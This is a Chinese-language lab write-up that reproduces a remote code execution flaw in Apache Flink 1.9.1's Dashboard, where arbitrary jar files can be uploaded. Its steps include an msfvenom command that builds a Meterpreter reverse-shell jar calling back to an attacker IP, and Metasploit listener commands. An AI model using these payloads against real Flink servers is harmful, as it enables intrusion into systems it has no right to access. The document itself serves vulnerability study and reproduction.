Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現


##0x00 簡介 Flink核心是一個流式的數據流執行引擎,其針對數據流的分布式計算提供了數據分布、數據通信以及容錯機制等功能。基於流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分布式任務。

##0x01 漏洞概述 攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的。

##0x02 影響版本 至目前最新版本Apache Flink 1.9.1 漏洞危害: 高危

##0x03 環境搭建 kali 192.168.115.43 受害機 win10 192.168.115.16 攻擊者 測試環境:Flink 1.9.1 java8+ Apache Flink 1.9.1安裝包下載

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

##0x04 漏洞復現 1)tar -zxvf flink-1.9.1-bin-scala_2.11.tgz 2)到bin文件夾運行./start-cluster.sh 3)環境搭建成功 目標站點 http://127.0.0.1:8081

4)生成jar后門包 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.115.16 LPORT=2019 -f jar > sylon.jar

5)攻擊機訪問目標站點 並上傳sylon.jar

6)配置監聽 use exploit/multi/handler set payload java/shell/reverse_tcp set LHOST 192.168.115.16 set LPORT 2019 show options run

7)漏洞觸發

##0x05 修復方案 等待官網更新補丁或等待官網出最新版本后及時更新

##0x06 參考文檔 https://mp.weixin.qq.com/s/HTFDYWlXfYe7fyGNJVwpSw


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM